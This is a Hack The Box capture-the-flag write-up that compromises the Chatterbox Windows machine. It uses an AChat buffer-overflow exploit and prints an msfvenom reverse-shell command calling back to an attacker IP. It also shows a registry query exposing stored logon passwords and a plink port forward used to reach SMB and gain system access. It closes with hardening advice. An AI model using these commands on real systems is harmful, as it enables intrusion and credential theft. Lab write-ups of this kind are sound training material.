Hack The Box is an online platform that hosts virtual machines that are vulnerable by design to sharpen one’s penetration testing and security skills. Gaining system access on the Chatterbox machine is not very complex as an initial low privilege shell can be obtained through a service with a known vulnerability and publicly available exploit. Elevating privileges and gaining system access can be a bit more challenging as it requires some more advanced techniques.
- Reg query, Netstat and Certutil
- Python’s SimpleHTTPServer
- ImPacket Psexec.py
Running an initial scan with Nmap reveals no open ports.
Investigating further, a full TCP port scan with the options -n -Pn -T5 to speed up the scan reveals ports 9255 and 9256 are open.
Running a targeted service scan against both ports reveals the AChat service.
A quick search with searchsploit reveals two public exploits for the AChat service.
As Python is my language of choice I copy the Python exploit from the local exploit database to investigate and modify it where necessary.
Inspecting the exploits code reveals it is a buffer overflow exploit.
The author of the exploit included the msfvenom command used to generate the exploits shellcode. Upon successfully exploiting the buffer overflow the shellcode executes the calculator application as a proof of concept.
Further inspection of the exploit code reveals a hard-coded IP address that needs to be changed to the IP address of the victim.
Exploitation: Initial Shell
As noted earlier, the shellcode of the exploit executes calculator upon successful exploitation. To gain a shell on the victim the shellcode needs to be replaced with a shellcode that connects back to the attacking machine to create a reverse shell.
A new shellcode can be generated with following msfvenom command. Note the use of EXITFUNC=thread to make an application crash less likely when the process crashes or exits.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=443 EXITFUNC=thread -a x86 --platform windows -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Now that the old shellcode is replaced and the IP of the victim is changed an Ncat listener should be prepared on port 443.
Executing the modified exploit with Python.
The victim connects back to the Ncat listener creating a low privilege reverse shell as the user Alfred.
Windows privilege escalation techniques are worth a post on their own. For now, what is relevant is that a registry query for default logon credentials reveals a stored clear text password.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultPassword"
Further investigation with the netstat command line utility reveals the Windows SMB service is listening on port 445. Port 445 is not available externally as it did not show up on the Nmap scan results during the enumeration phase. External access to port 445 is likely blocked by the Windows firewall.
With some clever port forwarding techniques it is possible to make port 445 available to the attacking machine even with the firewall blocking external access. To create a port forward for port 445 the plink.exe command line utility can be leveraged. Before the port forward can be executed the plink.exe utility needs to be transferred to the victim machine.
More about techniques to transfer files to a Windows victim can be found in a previous post here.
Copying and compressing the plink.exe executable and preparing the Python SimpleHTTPServer on port 80 to serve the plink.exe utility over HTTP.
Preparing the OpenSSH server on the attacking machine to allow the port forward that will be initiated from the victim.
Now that the Python SimpleHTTPServer is running the certutil.exe command line utility on the victim can be leveraged to download plink.exe.
Now that the plink.exe command line utility is available on the victim a port forward for port 445 can be initiated. The port forward makes port 445 available on the attacking machine at the address 127.0.0.1 also known as the loopback or localhost interface.
plink.exe -l root -R 445:127.0.0.1:445 10.10.14.17
To verify the port forward was successful the netstat command line utility can be run on the attacking machine. Here port 445 is in a listening state on the loopback interface confirming that the port forward was successful.
Now that port 445 is available on the attacking machine and the firewall is bypassed the Windows SMB service is open to attack. Creating a shell with the discovered clear text password is trivial with the popular ImPacket Psexec Python script from Core Security.
The latest AChat software is vulnerable to a buffer overflow that leads to a low privilege shell. The shell exposes the Windows SMB service running on the victim. After some clever use of port forwarding a system shell can be initiated over SMB with the recovered clear text password gaining system access and fully compromising the machine.
The Chatterbox compromise serves as a good example of why machine hardening and outbound traffic filtering are important aspects of system security that should not be overlooked.
The following configuration changes should be considered to mitigate risk.
- Limit the use and storage of clear text credentials when possible
- Access to the AChat service should be disabled and alternatives should be researched as there is no patch available for the discovered vulnerability
- Consider disabling the Windows SMB service and other unneeded services to reduce the attack surface of the machine
- Consider configuring the firewall to block outgoing traffic for applications that do not need network access
Furthermore, the following policy changes should be considered.
- Implement strong password policy guidelines and enforce those guidelines where possible
- Develop and implement a system hardening policy to reduce the attack surface of new and existing machines